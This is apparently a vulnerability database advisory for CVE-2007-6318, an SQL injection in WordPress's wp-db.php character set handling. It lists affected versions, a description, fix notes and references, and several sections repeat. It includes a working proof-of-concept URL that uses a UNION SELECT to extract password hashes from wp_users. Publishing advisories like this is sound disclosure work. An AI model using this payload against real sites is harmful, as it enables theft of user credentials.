WordPress wp-db.php Character Set SQL Injection Vulnerability
BID:26795
Info
WordPress wp-db.php Character Set SQL Injection Vulnerability
| Bugtraq ID: | 26795 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6318 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 10 2007 12:00AM |
| Updated: | Apr 13 2015 09:35PM |
| Credit: | Abel Cheung is credited with the discovery of this vulnerability. |
| Vulnerable: |
WordPress WordPress 2.3.1 WordPress WordPress 2.2.3 WordPress WordPress 2.2.2 WordPress WordPress 2.2.1 WordPress WordPress 2.1.3 WordPress WordPress 2.1.2 WordPress WordPress 2.1.1 WordPress WordPress 2.0.10 WordPress WordPress 2.0.7 WordPress WordPress 2.0.6 WordPress WordPress 2.0.5 WordPress WordPress 2.0.4 WordPress WordPress 2.0.3 WordPress WordPress 2.0.2 WordPress WordPress 2.0.1 WordPress WordPress 2.0 WordPress WordPress 2.3 WordPress WordPress 2.2 Revision 5003 WordPress WordPress 2.2 Revision 5002 WordPress WordPress 2.2 WordPress WordPress 2.1.3-RC2 WordPress WordPress 2.1.3-RC1 WordPress WordPress 2.1 WordPress WordPress 2.0.10-RC2 WordPress WordPress 2.0.10-RC1 Redhat Fedora 7 |
| Not Vulnerable: | |
Discussion
WordPress wp-db.php Character Set SQL Injection Vulnerability
WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
WordPress wp-db.php Character Set SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept exploit is available:
http://www.example.com/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
Attackers can use a browser to exploit this issue.
The following proof-of-concept exploit is available:
http://www.example.com/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
Solution / Fix
WordPress wp-db.php Character Set SQL Injection Vulnerability
Solution:
Please see the references for vendor advisories.
NOTE: Further reports from the discoverer of this vulnerability suggest that this issue has not been properly addressed in some Linux distros. Please see the referenced Bugtraq message for more information.
Solution:
Please see the references for vendor advisories.
NOTE: Further reports from the discoverer of this vulnerability suggest that this issue has not been properly addressed in some Linux distros. Please see the referenced Bugtraq message for more information.
References
WordPress wp-db.php Character Set SQL Injection Vulnerability
References:
References:
- WordPress Charset SQL injection vulnerability (Abel Cheung)
- Wordpress church_admin Plugin "id" Cross-Site Scripting Vulnerability (Sammy Forgit)
- WordPress Charset SQL injection vulnerability (Abel Cheung
) - Fedora, Ubuntu publish wrong advisories for CVE-2007-6318 (Abel Cheung
)